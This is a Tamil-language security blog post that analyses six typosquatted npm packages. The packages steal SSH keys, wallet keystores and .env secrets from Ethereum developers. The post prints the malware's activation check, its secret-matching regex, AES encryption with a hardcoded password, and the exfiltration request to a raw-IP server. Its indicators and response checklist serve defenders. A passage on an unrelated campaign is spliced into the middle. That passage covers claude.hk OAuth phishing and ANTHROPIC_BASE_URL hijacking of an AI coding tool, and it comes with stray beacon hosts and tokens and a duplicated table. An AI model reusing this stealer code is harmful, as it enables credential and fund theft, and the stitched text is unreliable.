EVMDeFi npm டைபோஸ்க்வாட்டிங் தாக்குதல் டெவலப்பர் திறவிகளைத் திருடுகிறது

EVM/DeFi npm டைபோஸ்க்வாட்டிங் தாக்குதல் டெவலப்பர் திறவுச்சொற்களைத் திருடுகிறது

பொருளடக்கம்

கட்டாயம் படிக்க வேண்டிய பதிவுகள்

சமீபத்திய சுவாரஸ்யமான பதிவு

டிஎல்; DR

மே 6, 2026 அன்று, ஒரு தனிப்பட்ட npm பப்ளிஷர், namikazesarada010206Ethereum, Solidity மற்றும் DeFi டெவலப்பர் சூழலமைப்பைக் குறிவைத்து ஆறு தீங்கிழைக்கும் தொகுப்புகள் பரப்பப்பட்டன.

அந்தப் பொட்டலங்கள், viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, மற்றும் web3-utils-coreபிரபலமான Web3 கருவிகளுக்கான உதவி நூலகங்களைப் போல் தோற்றமளிக்கும் வகையில், நம்பத்தகுந்த பெயர்கள் பயன்படுத்தப்பட்டன.

ஆறு பொட்டலங்களிலும் ஒரே மாதிரியானவை இருந்தன. telemetry.js கோப்பு. அந்தக் கோப்பு கிளஸ்டர் முழுவதும் பைட் அளவில் ஒரே மாதிரியாக இருந்தது, அதன் SHA-256:

எஸ்எச்எ 256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

தீம்பொருள் நிறுவப்படும் நேரத்தில் செயல்படுவதில்லை. அங்கு எதுவும் இல்லை. preinstall or postinstall அதற்குப் பதிலாக, தொகுப்பு இறக்குமதி செய்யப்படும்போது இது செயல்படுத்தப்படுகிறது. require().

அந்த விவரம் முக்கியமானது.

ஒரு டெவலப்பர் அந்தத் தொகுப்பை உண்மையில் பயன்படுத்தும் வரை இந்த இம்ப்ளான்ட் காத்திருக்கும். பின்னர், அந்தப் பணிநிலையம் ஒரு உண்மையான Ethereum / Solidity மேம்பாட்டுச் சூழலைப் போல் உள்ளதா என்பதை அது சரிபார்க்கிறது. அது Alchemy அல்லது Infura சாவிகள், தனிப்பட்ட சாவிகள், நினைவூட்டல் குறியீடுகள், டிப்ளாயர் சாவிகள் அல்லது ஒரு உள்ளூர் Foundry கோப்பகம் ஆகியவற்றைத் தேடுகிறது.

ஹோஸ்ட் பொருந்தினால், திருடன் SSH பிரைவேட் கீகள், Foundry / Geth / Brownie வாலட் கீஸ்டோர்கள் ஆகியவற்றைச் சேகரிக்கிறான். .env* கோப்புகள் மற்றும் முக்கியமான சூழல் மாறிகள். இது, நிரலில் நேரடியாக இடப்பட்ட கடவுச்சொல்லைப் பயன்படுத்தி AES-256-GCM மூலம் அந்தக் கோப்புத் தொகுப்பைக் குறியாக்கம் செய்து, TLS சரிபார்ப்பு முடக்கப்பட்ட ஒரு மூல IPv4 C2 முனையத்திற்கு அதை வெளியேற்றுகிறது.

சைஜெனி-யின் தீம்பொருள் முன்கூட்டிய எச்சரிக்கை (MEW) அமைப்பு, ஆறு தொகுப்புகளையும் தீங்கிழைப்பவை என உறுதிப்படுத்தியுள்ளது. npm ரெஜிஸ்ட்ரி நீக்க அறிக்கை தொகுப்பு நிலுவையில் உள்ளது.

கிளஸ்டர்: ஆறு தொகுப்புகள், ஒரே பதிப்பாளர்

பதிப்பாளர் கணக்கு namikazesarada010206 சரிபார்க்கப்படாத ஜிமெயில் முகவரியுடன் இணைக்கப்பட்டிருந்தது namikazesarada010206@gmail.com.

இந்தப் பிரச்சாரம் மே 6, 2026 அன்று ஒரே நாள் வெளியீடாக வெளிவந்தது. ஆறு தொகுப்புகளும் பின்வருமாறு பதிப்பிக்கப்பட்டன: 1.0.0, பூஜ்ஜிய இயக்க நேரச் சார்புகளைக் கொண்டிருந்தது, மற்றும் மூன்று கோப்புகளை மட்டுமே அனுப்பியது:

package.json index.js telemetry.js

அவர்களும் அதே மூலக் களஞ்சியத்தை அறிவித்தனர்:

https://github.com/harunosakura030303-maker/evmchain-config

முதல் மூன்று தொகுப்புகளும் முதல் வெளியீட்டின்போதே MEW ஸ்கேனர்களால் கண்டறியப்பட்டன. மீதமுள்ள மூன்றும், வெளியீட்டாளரின் npm சுயவிவரத்தை ஆய்வாளர் ஆய்வு செய்த பிறகு வலுக்கட்டாயமாகக் கொடியிடப்பட்டன. ஒரே பைட்-ஒரே மாதிரியான telemetry.js கிளஸ்டர் முழுவதும் உறுதிப்படுத்தப்பட்டதால், அவை சீரான தன்மையின் அடிப்படையில் தீங்கிழைக்கும் தன்மையுடையவை எனக் கருதப்பட்டு மூடப்பட்டன.

தொகுப்பு பதிப்பு npm வெளியிடப்பட்டது MEW டிக்கெட் தீர்ப்பு
வியெம்-கோர் 1.0.0 2026-05-06 01:38:44Z #51049 தீங்கிழைக்கும்
viem-utils-core 1.0.0 2026-05-06 #51050 தீங்கிழைக்கும்
ஹார்ட்ஹாட்-கோர்-யூடில்ஸ் 1.0.0 2026-05-06 #51051 தீங்கிழைக்கும்
evm-utils 1.0.0 2026-05-06 #51069 நிலைத்தன்மையால் தீங்கிழைக்கும்
வார்ப்பு-பயன்பாடுகள் 1.0.0 2026-05-06 #51071 நிலைத்தன்மையால் தீங்கிழைக்கும்
web3-utils-core 1.0.0 2026-05-06 #51070 நிலைத்தன்மையால் தீங்கிழைக்கும்

பெயரிடும் உத்தி எளிமையானது ஆனால் பயனுள்ளது.

இந்தத் தொகுப்புகள் மூலத்தின் சரியான பெயர்களைப் போல ஆள்மாறாட்டம் செய்வதில்லை. மாறாக, அவை பின்வரும் நம்பத்தகுந்த "பயன்பாட்டு" பின்னொட்டுகளைப் பயன்படுத்துகின்றன: -core, -utils, மற்றும் -utils-coreஅது, Web3 கருவிகளுக்கு அருகில் ஒரு டெவலப்பர் காண எதிர்பார்க்கக்கூடிய துணை நூலகங்களைப் போல அவற்றைக் காட்டுகிறது.

தீங்கிழைக்கும் தொகுப்பு சட்டபூர்வமான இலக்கு
வியெம்-கோர் viem, ஒரு பிரபலமான Ethereum TypeScript கிளையன்ட்
viem-utils-core வியெம்
ஹார்ட்ஹாட்-கோர்-யூடில்ஸ் ஹார்ட்ஹாட், ஒரு பிரதான சாலிடிட்டி மேம்பாட்டுச் சூழல்
evm-utils பொதுவான EVM கருவி பெயர்வெளி
வார்ப்பு-பயன்பாடுகள் ஃபவுண்டரி, ஒரு சாலிடிட்டி கருவித் தொடர்
web3-utils-core web3-utils, Web3.js உதவியாளர்கள்

இதுதான் “துணைத் தொகுப்பு” பாணி: அதாவது, “நான்தான் உண்மையான தொகுப்பு” என்பதல்ல, மாறாக “அந்த உண்மையான தொகுப்பைச் சுற்றி நான் ஒரு தகுந்த உதவியாளராகத் தெரிகிறேன்” என்பதே.

வேகமாகச் செயல்படும் DeFi உருவாக்குநர்களுக்கு, அதுவே ஆபத்தை உருவாக்கப் போதுமானது.

பொதி இறக்குமதி செய்யப்படும்போது என்ன நடக்கும்

இந்தத் தாக்குதல் சங்கிலி சிறியதாகவும், திட்டமிட்டதாகவும், கிரிப்டோ மேம்பாட்டுச் சூழல்களைக் குறிவைப்பதாகவும் உள்ளது.

நிறுவல் இணைப்பு எதுவும் இல்லை. அதற்குப் பதிலாக, ஒவ்வொரு தொகுப்பும் ஒரு index.js அது ஸ்டப் செயல்பாட்டை ஏற்றுமதி செய்துவிட்டு, பின்னர் தீங்கிழைக்கும் டெலிமெட்ரி தொகுதியை ஏற்றுகிறது.

require('./telemetry').init();

இதன் பொருள், தீம்பொருள் முதல் முறையாக இறக்குமதி செய்யப்படும்போதே செயல்படத் தொடங்குகிறது.

அது தாக்குபவருக்கு செயல்பாட்டு ரீதியாகப் பயனுள்ளது. பல ஸ்கேனர்களும் சாண்ட்பாக்ஸ்களும் நிறுவும் நேரச் செயல்பாடுகளில் கவனம் செலுத்துகின்றன. இந்தத் தொகுப்பு, ஒரு டெவலப்பர், பில்ட் ஸ்கிரிப்ட், சோதனைத் தொகுப்பு அல்லது ரன்டைம் பாதையால் உண்மையில் பயன்படுத்தப்படும் வரை காத்திருக்கிறது.

செயல்படுத்தும் வாயில்: உண்மையான Web3 டெவலப்பர் பணிநிலையங்களில் மட்டுமே செயல்படும்

உள்வைப்பின் மிக முக்கியமான பகுதி செயல்படுத்தும் வாயில் ஆகும்.

இந்த தீம்பொருள், Ethereum / Solidity டெவலப்பர் கணினிகளில் பொதுவாகக் காணப்படும் சூழல் மாறிகளைச் சரிபார்க்கிறது:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

ஃபவுன்ட்ரி நிறுவப்பட்டுள்ளதா என்பதையும் இது சரிபார்க்கிறது:

fs.existsSync(path.join(os.homedir(), '.foundry'))

இரண்டு நிபந்தனைகளும் உண்மையாக இல்லாவிட்டால், செயல்பாடு திரும்பி வந்து எதுவும் செய்யாது.

இது பொதுவான பகுப்பாய்வுச் சூழல்களில் தொகுப்பை அமைதியாக்குகிறது. Foundry, Alchemy சாவிகள், Infura சாவிகள், தனிப்பட்ட சாவிகள் அல்லது நினைவூட்டல்கள் இல்லாத ஒரு சோதனைக் களத்தில், பாதிப்பில்லாதது போல் தோற்றமளிக்கும் ஒரு இறக்குமதியைக் காணக்கூடும்.

பொருத்தமான ஹோஸ்டில், தீம்பொருள் தரவுகளைச் சேகரிப்பதற்கு முன் 60 முதல் 90 வினாடிகள் வரை காத்திருக்கும்:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

இந்தத் தாமதம், இறக்குமதிக்கும் வெளியேற்றத்திற்கும் இடையிலான வெளிப்படையான தொடர்பைக் குறைக்கிறது. .unref() ஒரு தொகுப்பு குறுகிய கால ஸ்கிரிப்ட்டில் இறக்குமதி செய்யப்பட்டிருந்தால், இந்த அழைப்பு ஹோஸ்ட் செயல்முறையை சாதாரணமாக வெளியேறவும் அனுமதிக்கிறது.

இது ஆரவாரம் செய்து திடீரெனக் கொள்ளையடிக்கும் செயல்பாடு அல்ல. டெவலப்பர் சூழலிலிருந்து திருடுவது மதிப்புள்ளதாக இருந்தால் தவிர, இயங்குவதைத் தவிர்ப்பதற்காக வடிவமைக்கப்பட்ட ஒரு இலக்கு வைக்கப்பட்ட திருடன் இது.

திருடன் சேகரிப்பவை

செயல்படுத்தும் தடையைக் கடந்தவுடன், அந்த தீம்பொருள் Web3 உருவாக்கத்தில் மிகவும் முக்கியமான ஆதாரங்களான தனிப்பட்ட சாவிகள், வாலட் கீஸ்டோர்கள், வரிசைப்படுத்தல் நற்சான்றிதழ்கள், கிளவுட் இரகசியங்கள், npm டோக்கன்கள் மற்றும் உள்ளூர் திட்ட உள்ளமைவு ஆகியவற்றிலிருந்து தரவுகளைச் சேகரிக்கிறது.

மூல என்ன சேகரிக்கப்படுகிறது
செயல்முறை.என்வி /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i உடன் பொருந்தும் எந்தவொரு மாறியும்
~/.ssh/* PRIVATE KEY அல்லது BEGIN OPENSSH என்ற சொற்களைக் கொண்ட கோப்புகள், முழு கோப்பு உள்ளடக்கம் உட்பட.
~/.foundry/keystores/* ஃபவுண்டரி வாலட் கீஸ்டோர் கோப்புகள்
~/.ethereum/keystore/* கெத் வாலட் கீஸ்டோர் கோப்புகள்
~/.brownie/accounts/* பிரவுனி வாலட் கீஸ்டோர் கோப்புகள்
${cwd}/.env முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.local முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.production முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.development முழு கோப்பு உள்ளடக்கம்
os.hostname() ஹோஸ்ட் மெட்டாடேட்டா
crypto.randomUUID() பாதிக்கப்பட்டவர்/அமர்வு அடையாளங்காட்டி
தேதி.இப்போது() சேகரிப்பு நேரமுத்திரை
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA டோக்கன்கள் பின்வருமாறு:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

அந்த டெலிமெட்ரி, ஆபரேட்டரின் சொந்தப் பகுப்பாய்வா அல்லது தனியாக வருமானம் ஈட்டப்பட்ட ஒரு சேனலா என்பதை எங்களால் உறுதிப்படுத்த முடியவில்லை. நாங்கள் ஆய்வு செய்த இரண்டு மாதிரிகளிலும் ATTA டோக்கன்கள் ஒரே மாதிரியாக உள்ளன.

கிளஸ்டர் B: ஹெய்பாய்

claude.hk OAuth ஃபிஷிங் + ANTHROPIC_BASE_URL ஹைஜாக்

ஏப்ரல் 1 ஆம் தேதி மாதிரி என்பது பிரச்சாரத்தின் கச்சாத்தனமான, முற்காலப் பகுதியாகும்.

heibai:2.1.88-claude.hk-4 மூலம் வெளியிடப்பட்டது wuguoqiangvip28ஜூன் 7, 2025 அன்று உருவாக்கப்பட்ட ஒரு கணக்கு. அந்தத் தொகுப்பு, முறையான பதிப்பிற்கு எதிராகத் தன்னைத் தானே வெளிப்படையாகப் பதிப்பித்துக் கொண்டது. 2.1.88 மானுட வெளியீடு.

இது CA-cert MITM-ஐப் பொருட்படுத்துவதில்லை. மாறாக, OAuth எண்ட்பாயிண்ட் குறித்து பயனரிடம் பொய் சொல்கிறது.

கசிந்த கிளாட் கோட் மூலக் குறியீட்டின் மீது சேர்க்கப்பட்டுள்ள தீங்கிழைக்கும் அம்சங்கள் பின்வருமாறு:

மூல என்ன சேகரிக்கப்படுகிறது
செயல்முறை.என்வி /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i உடன் பொருந்தும் எந்தவொரு மாறியும்
~/.ssh/* PRIVATE KEY அல்லது BEGIN OPENSSH என்ற சொற்களைக் கொண்ட கோப்புகள், முழு கோப்பு உள்ளடக்கம் உட்பட.
~/.foundry/keystores/* ஃபவுண்டரி வாலட் கீஸ்டோர் கோப்புகள்
~/.ethereum/keystore/* கெத் வாலட் கீஸ்டோர் கோப்புகள்
~/.brownie/accounts/* பிரவுனி வாலட் கீஸ்டோர் கோப்புகள்
${cwd}/.env முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.local முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.production முழு கோப்பு உள்ளடக்கம்
${cwd}/.env.development முழு கோப்பு உள்ளடக்கம்
os.hostname() ஹோஸ்ட் மெட்டாடேட்டா
crypto.randomUUID() பாதிக்கப்பட்டவர்/அமர்வு அடையாளங்காட்டி
தேதி.இப்போது() சேகரிப்பு நேரமுத்திரை

இலக்குப் பட்டியல் மிகவும் குறிப்பிட்டது. இது பொதுவான உலாவித் திருட்டோ அல்லது பரந்த நற்சான்றிதழ் சுரண்டலோ அல்ல. இது எத்தேரியம் பயன்பாடுகளை உருவாக்கும், சோதிக்கும், செயல்படுத்தும் அல்லது இயக்கும் டெவலப்பர்களை இலக்காகக் கொண்டது.

Foundry, Geth, மற்றும் Brownie கீஸ்டோர்களின் உள்ளடக்கமானது குறிப்பாக முக்கியமானது. இந்தக் கோப்புகள் வாலெட்டுகள் அல்லது டிப்ளாய்மென்ட் அடையாளங்களுக்கான நேரடி அணுகலை வழங்கக்கூடும். தாக்குபவர் அவற்றை கடவுச்சொற்கள், நினைவூட்டல் குறியீடுகள் அல்லது சூழல் இரகசியங்களுடன் இணைக்க முடிந்தால், அவர்களால் நிதியை நகர்த்தவோ, டிப்ளாய் செய்பவர்களைப் போல் ஆள்மாறாட்டம் செய்யவோ, அல்லது ஸ்மார்ட் கான்ட்ராக்ட் செயல்பாடுகளைச் சீர்குலைக்கவோ முடியும்.

தரவு கசிவுக்கு முன் குறியாக்கம்

அந்த தீம்பொருள், சேகரிக்கப்பட்ட தரவுகளை அனுப்புவதற்கு முன்பு குறியாக்கம் செய்கிறது.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

நிரலில் நேரடியாகப் பதியப்பட்ட கடவுச்சொல்:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

இறுதித் தரவு JSON வடிவத்தில் தொகுக்கப்பட்டுள்ளது:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

குறியாக்கம் மட்டுமே தீம்பொருளை மேலும் மேம்பட்டதாக மாற்றுவதில்லை. இருப்பினும், அது பிணைய ஆய்வைக் கடினமாக்குகிறது. வெளியேறும் தரவைக் கண்காணிக்கும் ஒரு பாதுகாப்பு அமைப்பு, ஒரு JSON தரவுப் பொதியைக் காணும், ஆனால் திருடப்பட்ட சாவிகள், பணப்பை கோப்புகள் அல்லது வேறு எதையும் காணாது. .env நிரலில் நேரடியாக இடப்பட்ட கடவுச்சொல் மற்றும் மறைகுறியாக்கத் தர்க்கம் இல்லாத உள்ளடக்கங்கள்.

மூல IPv4 C2 க்கு தரவு கசிவு

கசிவுப் பாதை நிரலில் நேரடியாகக் குறிப்பிடப்பட்டுள்ளது:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

தீம்பொருள் பின்வரும் இடத்திற்குத் தரவை அனுப்புகிறது:

https://76.13.37.80:8443/api/v1/telemetry

இரண்டு விவரங்கள் தனித்துத் தெரிகின்றன.

முதலில், C2 என்பது ஒரு டொமைனுக்குப் பதிலாக ஒரு மூல IPv4 முகவரியாகும். அது டொமைன் பதிவின் தேவையை நீக்குவதோடு, டொமைன் அடிப்படையிலான சில கண்டறிதல்களையும் தவிர்க்கிறது.

இரண்டாவதாக, TLS சரிபார்ப்பு பின்வருவனவற்றால் முடக்கப்பட்டுள்ளது:

rejectUnauthorized: false

அது, சுயமாக கையொப்பமிடப்பட்ட சான்றிதழ்கள் உட்பட எந்தவொரு சான்றிதழையும் தீம்பொருள் ஏற்றுக்கொள்ள அனுமதிக்கிறது. வேறுவிதமாகக் கூறினால், தாக்குபவர் செல்லுபடியாகும் பொதுச் சான்றிதழ் தேவையின்றி மறைகுறியாக்கப்பட்ட தரவுப் பரிமாற்றத்தைப் பெறுகிறார்.

மீண்டும் முயற்சிக்கும் தர்க்கமோ அல்லது மாற்று ஹோஸ்டோ இல்லை. பிழைகள் சத்தமின்றி மறைக்கப்படுகின்றன. C2 ஆஃப்லைனில் இருந்தாலோ அல்லது அணுக முடியாத நிலையில் இருந்தாலோ, இது தொகுப்பை அமைதியாக வைத்திருக்கிறது.

இந்த பிரச்சாரம் ஏன் முக்கியமானது?

டெவலப்பர்களை இலக்காகக் கொண்ட பெரும்பாலான தீங்கிழைக்கும் npm தொகுப்புகள், npm டோக்கன்கள், AWS கீகள், GitHub டோக்கன்கள் போன்ற பரந்த சான்றுகளைப் பின்தொடர்கின்றன. .npmrc கோப்புகளை.

இந்தப் பிரச்சாரம் இலக்கைச் சுருக்குகிறது.

அந்த இயந்திரம் ஒரு எத்தேரியம் அல்லது சாலிடிட்டி டெவலப்பருக்குச் சொந்தமானது என்பதற்கான அறிகுறிகளை இது தேடுகிறது. பின்னர், அந்தச் சூழலுக்கு முக்கியமான சொத்துக்களை இது துல்லியமாகப் பிரித்தெடுக்கிறது: வாலட் கீஸ்டோர்கள், பிரைவேட் கீகள், மனிமோனிக்ஸ், டிப்ளாயர் கீகள். .env கோப்புகள் மற்றும் SSH திறவிகள்.

அது, ஒரு சாதாரண npm ஸ்டீலரை விட, Web3 குழுக்களுக்கு அந்தப் பிரச்சாரத்தை மிகவும் ஆபத்தானதாக ஆக்குகிறது.

ஒரு வெற்றிகரமான தொற்று பின்வருவனவற்றை வெளிப்படுத்தக்கூடும்:

  • வரிசைப்படுத்தல் பணப்பைகள்
  • ஸ்மார்ட் ஒப்பந்த நிர்வாகி விசைகள்
  • RPC வழங்குநர் விசைகள்
  • கிளவுட் வரிசைப்படுத்தல் நற்சான்றிதழ்கள்
  • npm வெளியீட்டு டோக்கன்கள்
  • டெவலப்பர் அல்லது பில்ட் உள்கட்டமைப்பிற்கான SSH அணுகல்
  • திட்ட இரகசியங்கள் சேமிக்கப்பட்டுள்ளன .env கோப்புகளை
  • Foundry, Geth, அல்லது Brownie-க்கான வாலட் கீஸ்டோர்கள்

இந்தத் தொகுப்புப் பெயர்கள் தெளிவான சமூகப் பொறியியலையும் காட்டுகின்றன. அவை, நன்கு அறிமுகமான கருவிப் பெயர்கள் மூலம் Web3 உருவாக்குநர் சூழலைக் குறிவைக்கின்றன: viem, hardhat, foundry, evm, மற்றும் web3.

நடிகர் உண்மையான திட்டங்களில் சமரசம் செய்துகொள்ளத் தேவையில்லை. நியாயமானதாகத் தோன்றும் ஒரு துணைத் தொகுப்பை நிறுவுவதற்கு ஒரு டெவலப்பர் மட்டும் அவர்களுக்குத் தேவை.

சமரச மற்றும் கண்டறிதல் குறிகாட்டிகள்

தொகுப்புகள் மற்றும் வெளியீட்டாளர்
களம் மதிப்பு
npm வெளியீட்டாளர் namikazesarada010206
பதிப்பாளர் மின்னஞ்சல் namikazesarada010206@gmail.com
மின்னஞ்சல் சரிபார்க்கப்பட்டது இல்லை
SCM சரிபார்க்கப்பட்டது இல்லை
நற்பெயர் மதிப்பெண் 1.0
தொகுப்புகள் viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core
பதிப்புகள் அனைத்து 1.0.0
மூலக் களஞ்சியம் https://github.com/harunosakura030303-maker/evmchain-config
தீங்கிழைக்கும் என உறுதிப்படுத்தப்பட்டது ஆறு தொகுப்புகளும்
பிணையம்
வகை மதிப்பு
C2 முனை https://76.13.37.80:8443/api/v1/telemetry
சி2 ஐபி 76.13.37.80
C2 போர்ட் 8443/டிசிபி
TLS நடத்தை அங்கீகரிக்கப்படாததை நிராகரி: தவறு
பேலோட் ஸ்கீமா {"v":2,"iv": "d": "t": }
கோப்புகள் மற்றும் ஹாஷ்கள்
வகை மதிப்பு
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
தொகுப்பு தளவமைப்பு package.json, index.js, telemetry.js
கோப்பு எண்ணிக்கை 3
தோராயமான மொத்த அளவு 3.4 கே.பி.

செயல்படுத்தும் சமிக்ஞைகள்

தீம்பொருள் பின்வரும் சூழல் மாறிகளைச் சரிபார்க்கிறது:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

இது பின்வருவனவற்றையும் சரிபார்க்கிறது:

~/.foundry/

இலக்கு ஹோஸ்ட் பாதைகள்

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

சேகரிப்பு ரெஜெக்ஸ்

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

கண்டறிதல் குறிப்புகள்

முழுமையான நடத்தைப் பகுப்பாய்வு தேவையின்றி, பல விதிகள் இந்த பிரச்சாரத்தைக் கண்டறிந்துவிடுகின்றன.

முதலில், ஆறு தீங்கிழைக்கும் தொகுப்புப் பெயர்களுக்காக லாக்ஃபைல்களை ஸ்கேன் செய்யவும்:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

எந்தவொரு போட்டியிலும் package-lock.json, yarn.lock, pnpm-lock.yaml, அல்லது node_modules வரலாற்றை ஒரு தீவிரமான சம்பவமாகக் கருத வேண்டும்.

இரண்டாவதாக, Node.js செயல்முறைகள் வாலட் கீஸ்டோர் பாதைகளைப் படிக்கின்றனவா என்பதைக் கண்காணிக்கவும்:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

துணைச் சார்புநிலையாக இறக்குமதி செய்யப்பட்ட ஒரு தொகுப்பிற்கு, இது அரிதாகவே முறையான செயல்பாடாகும். இதைத் தொடர்ந்து வெளிச்செல்லும் பிணையச் செயல்பாடு நிகழும்போது இது குறிப்பாகச் சந்தேகத்திற்குரியதாகிறது.

மூன்றாவதாக, HTTPS இணைப்புகளைத் தடுக்கவும் அல்லது எச்சரிக்கவும்:

76.13.37.80:8443

குறிப்பாக கோரிக்கை பாதை இதுவாக இருக்கும்போது:

/api/v1/telemetry

நான்காவதாக, இந்தப் பண்புகளை ஒருங்கிணைக்கும் npm தொகுப்புகளைத் தேடுங்கள்:

  • புதிய அல்லது குறைந்த நற்பெயர் கொண்ட பதிப்பாளர்
  • சரிபார்க்கப்படாத ஜிமெயில் கணக்கு
  • Web3-சார்ந்த தொகுப்பின் பெயர்
  • அர்த்தமுள்ள களஞ்சிய வரலாறு இல்லை
  • சிறிய தொகுப்பு தளவமைப்பு
  • index.js டெலிமெட்ரி அல்லது துணை கோப்பை ஏற்றுகிறது
  • இயக்க நேரச் சார்புகள் இல்லை
  • உணர்திறன் மிக்க சூழல்-மாறக்கூடிய சேகரிப்பு
  • வாலட் கீஸ்டோர் அணுகல்

ஒற்றை IOC-ஐ விட இந்த முறை மிகவும் பயனுள்ளது, ஏனெனில் அடுத்த தொகுப்பு IP முகவரியை மாற்றக்கூடும், ஆனால் அதே இலக்கு நிர்ணய தர்க்கத்தைத் தக்க வைத்துக் கொள்ளும்.

சமரச பதில் சரிபார்ப்புப் பட்டியல்

ஒரு டெவலப்பர் ஆறு தொகுப்புகளில் ஒன்றைப் பயன்படுத்தி, அவரது சூழல் செயல்படுத்தும் வாயிலுடன் பொருந்தினால், அந்தப் பணிநிலையத்தைப் பாதிப்புக்குள்ளானதாகக் கருதவும்.

அதில், Foundry நிறுவப்பட்ட கணினிகள், சூழலில் உள்ள Alchemy அல்லது Infura சாவிகள், தனிப்பட்ட சாவிகள், நினைவூட்டல் குறியீடுகள் அல்லது நிலைநிறுத்திச் சாவிகள் ஆகியவை அடங்கும்.

பரிந்துரைக்கப்பட்ட பதில்:

  • ஹோஸ்டை நெட்வொர்க்கிலிருந்து துண்டிக்கவும்.
  • பாதுகாப்பகம் node_modulesலாக்ஃபைல்கள், ஷெல் வரலாறு மற்றும் தடயவியல் ஆய்விற்கான தொடர்புடைய பதிவுகள்.
  • கீழ் உள்ள ஒவ்வொரு SSH விசை இணையையும் சுழற்றுங்கள் ~/.ssh/.
  • ஒவ்வொரு கீஸ்டோருக்கும் வாலட் சாவிகளை சுழற்றுங்கள் ~/.foundry, ~/.ethereum, மற்றும் ~/.brownie.
  • நிதியை புதிய வாலெட்டுகளுக்கு மாற்றவும்.
  • சேமிக்கப்பட்டுள்ள ஒவ்வொரு ரகசியத்தையும் சுழற்றுங்கள் .env* டெவலப்பர் பணியாற்றிய களஞ்சியங்களில் உள்ள கோப்புகள்.
  • AWS கீகள், npm டோக்கன்கள், டிப்ளாய் டோக்கன்கள், API கீகள், பிரைவேட் கீகள், சீட்கள் மற்றும் ம்னிமோனிக்ஸ் உள்ளிட்ட, கலெக்ஷன் ரெஜெக்ஸுடன் பொருந்தும் என்விரான்மென்ட் சீக்ரெட்களை சுழற்சி செய்யவும்.
  • இந்தத் தொகுப்பு முதன்முதலில் நிறுவப்பட்டதிலிருந்து கிளவுட், என்பிஎம், கிட்ஹப், ஆர்பிசி வழங்குநர் மற்றும் பிளாக்செயின் செயல்பாடுகளைத் தணிக்கை செய்யுங்கள்.
  • மீண்டும் பயன்படுத்துவதற்கு முன் பணிநிலையத்தை மறுபடியும் பிம்பமாக்குங்கள்.

பாதுகாவலர்கள் எடுத்துக்கொள்ள வேண்டியவை

உயர் மதிப்புள்ள டெவலப்பர் சூழல்களில் npm டைப்போஸ்க்வாட்டிங் எவ்வாறு உருவாகி வருகிறது என்பதை இந்தப் பிரச்சாரம் காட்டுகிறது.

அந்த நடிகருக்கு விடாமுயற்சி தேவைப்படவில்லை. அவர்களுக்குக் குழப்பம் தேவைப்படவில்லை. அவர்களுக்கு நிறுவல் நேரச் செயலாக்கம் கூடத் தேவைப்படவில்லை.

அதற்குப் பதிலாக, அவர்கள் மூன்று விஷயங்களைச் சார்ந்திருந்தனர்:

  • சாத்தியமான Web3 தொகுப்புப் பெயர்கள்
  • உண்மையான கிரிப்டோ-டெவலப்மெண்ட் இயந்திரங்களில் மட்டுமே செயல்படுத்த முடியும்
  • எத்தேரியம் டெவலப்பர்களுக்கு மிகவும் முக்கியமான கோப்புகள் மற்றும் இரகசியங்களை நேரடியாகத் திருடுதல்

அதனால், மேலோட்டமாகப் பார்க்கும்போது அந்தப் பிரச்சாரத்தைக் கண்டுகொள்ளாமல் விடுவது எளிது; மேலும், அது சரியான சூழலில் வெளிப்படும்போது ஆபத்தானதாகவும் அமைகிறது.

Web3 குழுக்களுக்கான பாடம் தெளிவாக உள்ளது: சார்புநிலைகளின் பெயர்களை உங்கள் அச்சுறுத்தல் மாதிரியின் ஒரு பகுதியாகக் கருதுங்கள். பாதிப்பில்லாத உதவியாளர் போலத் தோற்றமளிக்கும் ஒரு தொகுப்பு கூட, பண இழப்பை ஏற்படுத்தும் மிகக் குறுகிய பாதையாக மாறக்கூடும்.

npm ரெஜிஸ்ட்ரியில் புகாரளிக்கப்பட்டுள்ளது. பப்ளிஷர் கணக்கு மற்றும் பேக்கேஜ்கள் அகற்றப்பட்டதும், இந்தப் பதிவைப் புதுப்பிப்போம்.

sca-tools-software-composition-analysis-tools
உங்கள் மென்பொருள் அபாயங்களுக்கு முன்னுரிமை அளித்து, சரிசெய்து, பாதுகாக்கவும்.
உங்கள் இலவச கணக்கைப் பெறுங்கள்.
கடன் அட்டை தேவையில்லை.

உங்கள் மென்பொருள் உருவாக்கம் மற்றும் விநியோகத்தைப் பாதுகாக்கவும்

Xygeni தயாரிப்பு தொகுப்புடன்